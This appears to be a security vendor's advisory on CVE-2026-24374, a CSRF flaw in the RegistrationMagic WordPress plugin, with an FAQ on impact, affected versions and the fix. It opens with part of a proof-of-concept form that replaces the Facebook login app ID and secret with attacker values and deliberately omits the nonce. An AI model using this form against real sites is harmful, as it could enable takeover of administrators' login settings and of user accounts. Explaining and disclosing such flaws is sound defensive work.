        <input type="hidden" name="facebook_app_id" value="<?php echo htmlspecialchars($attacker_app_id); ?>" />
        <!-- Replace legitimate Facebook App Secret with attacker's secret -->
        <input type="hidden" name="facebook_app_secret" value="<?php echo htmlspecialchars($attacker_app_secret); ?>" />
        <!-- The form uses the same field names as the legitimate plugin form -->
        <input type="hidden" name="rm_slug" value="login-integrations" />
        <input type="hidden" name="rm_action" value="save_login_integrations" />
        <!-- No nonce parameter is included, exploiting the missing validation -->
    </form>
</body>
</html>

Frequently Asked Questions

What is CVE-2026-24374?
Understanding the vulnerability
CVE-2026-24374 is a Cross-Site Request Forgery (CSRF) vulnerability found in the RegistrationMagic plugin for WordPress, specifically in versions up to and including 6.0.6.9. It allows unauthenticated attackers to trick site administrators into performing unauthorized actions, such as modifying social login settings.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce validation in the `save_login_integrations` function. An attacker can create a malicious webpage that submits a forged request to the WordPress admin endpoint, changing sensitive social login configurations if an administrator visits the page.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the RegistrationMagic plugin version 6.0.6.9 or earlier is affected. Site administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Version verification process
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel and look for the RegistrationMagic plugin. Verify the version number; if it is 6.0.6.9 or earlier, your site is at risk.
How can I fix or mitigate this issue?
Steps to secure your site
To mitigate this vulnerability, update the RegistrationMagic plugin to version 6.0.7.0 or later, where nonce verification has been implemented. Regularly check for updates to all plugins to maintain security.
What does the risk level 'Medium' mean?
Understanding the CVSS score
A ‘Medium’ risk level, with a CVSS score of 4.3, indicates that while the vulnerability can be exploited, it requires some social engineering to succeed. Attackers need to trick an administrator into visiting a malicious page, which adds a layer of difficulty.
What could happen if this vulnerability is exploited?
Potential impacts of exploitation
If exploited, attackers could modify social login settings to redirect user authentication to malicious endpoints, leading to account takeovers or credential harvesting. This could severely disrupt user registration and login functionalities.
How does the proof of concept demonstrate the issue?
Technical demonstration of exploitation
The proof of concept shows how an attacker can craft a malicious HTML page that submits a forged request to the vulnerable endpoint. When an administrator visits this page, the script automatically submits the request, changing the social login settings to values controlled by the attacker.
What is nonce validation and why is it important?
Role of nonce in WordPress security
Nonce validation is a security measure in WordPress that helps prevent CSRF attacks by ensuring that requests are coming from legitimate users. It adds a unique token to forms that must be verified before processing, which was missing in the vulnerable function.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating vulnerable plugins, consider implementing security plugins that provide firewall protection, regular backups, and monitoring for suspicious activities. Educate administrators about phishing and social engineering tactics to reduce risks.
Where can I find more information on CVE-2026-24374?
Resources for further reading
More information about CVE-2026-24374 can be found on the official CVE database, security advisories from the plugin developers, and security blogs that analyze vulnerabilities. Staying informed about security updates is crucial for maintaining site safety.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations